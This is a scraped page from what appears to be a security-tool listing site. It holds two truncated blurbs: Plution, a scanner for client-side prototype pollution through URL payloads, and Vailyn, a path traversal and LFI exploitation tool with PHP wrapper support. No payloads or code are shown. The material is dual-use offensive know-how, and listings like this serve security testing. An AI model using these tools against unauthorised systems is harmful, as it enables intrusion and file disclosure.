<p style="text-align: center;"><a href="http://1.bp.blogspot.com/-Eph2jPyIEs4/YTVMaWNoJNI/AAAAAAAAt7w/2fS0PnouBd0kTzMlCj8esDtcSXJolnV1wCK4BGAYYCw/s1600/plution_1-714956.png"><img alt="" border="0" height="556" id="BLOGGER_PHOTO_ID_7004588810967721170" src="http://1.bp.blogspot.com/-Eph2jPyIEs4/YTVMaWNoJNI/AAAAAAAAt7w/2fS0PnouBd0kTzMlCj8esDtcSXJolnV1wCK4BGAYYCw/w640-h556/plution_1-714956.png" width="640" /></a></p> <br /> <p>Plution is a convenient way to scan at scale for pages that are <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="client side">client side</a> <a href="https://www.kitploit.com/search/label/Prototype%20Pollution" target="_blank" title="prototype pollution">prototype pollution</a> via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: <a href="htt...

Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

<h1 align="center"><a href="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/s1600/Vailyn_1_logo-700923.png"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7004590477845720946" src="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/w193-h400/Vailyn_1_logo-700923.png" width="193" /></a><br /> Vailyn <br /> </h1> <p align="center"><br /> Phased <a href="https://www.kitploit.com/search/label/Path%20Traversal" target="_blank" title="Path Traversal">Path Traversal</a> &amp; LFI Attacks </p> <blockquote> <p><strong>Vailyn 3.0</strong></p> <p>Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use <code>--lfi</code> to include them in the scan.</p> </blockquote> <br /><span style="font-size: x-large;"><b>About</b></span><br /> <p>Vailyn is a multi-phased <a href="https://www.kitploit.com/search/label/Vulnerability%20Analysis" target="_blank" title="...